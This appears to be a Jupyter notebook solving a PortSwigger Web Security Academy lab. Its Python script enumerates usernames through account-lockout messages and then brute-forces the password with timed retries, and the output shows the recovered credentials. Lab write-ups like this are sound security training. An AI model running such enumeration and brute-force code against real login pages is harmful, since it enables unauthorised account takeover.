# Password Based Logins - Username Enumeration: Account Lock

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-account-lock

We are looking for a different response if we enter a valid username a certain number of times than an invalid.

In [1]:
import requests
import re
import tqdm.notebook as tq
import time

In [2]:
URL = "https://acf21f471f962a85c0c1272c00df005d.web-security-academy.net/"

textfile_dir = "../../../library/text_files/"

with open(textfile_dir + "pw_list.txt", 'r') as f:
    passwords = [x.strip() for x in f.readlines()]

with open(textfile_dir + "uname_list.txt", 'r') as f:
    usernames = [x.strip() for x in f.readlines()]

In [3]:
#Username enumeration
s = requests.session()
r = s.get(URL + "login")

found = 0

for idx, each_username in enumerate(tq.tqdm(usernames)):
    
    data = {"username" : each_username, "password" : "XXXXXXXXXXXXXXXX"}
    
    for count in range(4):
    
        r = s.post(URL + "login", data=data)
        message = re.findall(r"<h1>Login</h1>[\s\S]*?<p.*?>(.*?)</p>", r.text)
        if message != ['Invalid username or password.']:
            print(message, count, each_username)
            found = 1
            break
            
    if found == 1:
        break
        
#Save the username
valid_username = each_username

  0%|          | 0/101 [00:00<?, ?it/s]

['You have made too many incorrect login attempts. Please try again in 1 minute(s).'] 3 adkit


Ok so we now have the username!

In [4]:
results = []

for idx, each_password in enumerate(tq.tqdm(passwords)):
    
    #Set up variable to check that each password has been fairly tested
    processed = 0
    
    while(processed == 0):
        
        data = {"username" : valid_username, "password" : each_password}
        r  = s.post(URL + "login", data=data)
        message = re.findall(r"<h1>Login</h1>[\s\S]*?<p.*?>(.*?)</p>", r.text)

        if message == ['You have made too many incorrect login attempts. Please try again in 1 minute(s).']:
            time.sleep(65)
        elif message == ['Invalid username or password.']:
            processed = 1
        else:
            results.append(r.text)
            print(each_password)
            processed = 1
            

  0%|          | 0/100 [00:00<?, ?it/s]

jennifer
